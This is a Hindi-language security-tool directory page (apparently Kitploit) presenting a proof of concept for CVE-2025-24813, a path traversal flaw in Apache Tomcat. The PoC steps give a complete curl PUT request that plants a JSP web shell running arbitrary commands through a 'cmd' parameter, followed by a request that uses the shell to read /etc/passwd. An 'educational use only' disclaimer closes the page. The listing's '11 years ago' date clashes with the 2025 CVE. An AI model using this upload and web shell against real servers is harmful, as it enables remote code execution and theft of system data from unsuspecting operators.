Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-24813 — Apache Tomcat, पथों में ../ अनुक्रमों के अनुचित प्रबंधन के कारण Path Equivalence / Path Traversal समस्या के लिए कमजोर है। | Kitploit
उपकरण/GitHubGitHub/muhammadwaseem29/cve-2025-24813
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubmuhammadwaseem29/cve-2025-24813

CVE-2025-24813

Apache Tomcat, पथों में ../ अनुक्रमों के अनुचित प्रबंधन के कारण Path Equivalence / Path Traversal समस्या के लिए कमजोर है।

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

CVE-2025-24813 - Apache Tomcat पथ समतुल्यता भेद्यता

Apache Tomcat, पथों में ../ अनुक्रमों के अनुचित हैंडलिंग के कारण पथ समतुल्यता / पथ भ्रमण समस्या के लिए संवेदनशील है।
CVE आईडी: CVE-2025-24813

  • गंभीरता: गंभीर

संदर्भ लिंक: https://github.com/advisories/GHSA-83qj-6fr2-vhqg


PoC चरण:

1. PUT विधि के साथ एक curl अनुरोध भेजें:

root@kitploit:~
curl -X PUT "http://target.com/uploads/../webapps/ROOT/updates.jsp" \
  -H "Content-Type: application/x-jsp" \
  --data-raw '<%@ page import="java.io.*" %>
<html><body>
<form method="GET"><input type="text" name="cmd"><input type="submit" value="Run"></form>
<% if(request.getParameter("cmd") != null) {
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
String l; while((l=r.readLine())!=null){ out.println(l+"<br>"); } } %>
</body></html>' -i

image

2. अपलोड की गई फ़ाइल तक सीधे पहुँचें:

root@kitploit:~
curl "http://target.com/updates.jsp?cmd=cat/etc/passwd" -i

image


यह रिपॉजिटरी केवल शैक्षिक उद्देश्यों और अधिकृत परीक्षण के लिए बनाई गई है।
बिना स्पष्ट अनुमति के सिस्टम के खिलाफ अनधिकृत उपयोग अवैध है।


टूल डाउनलोड करें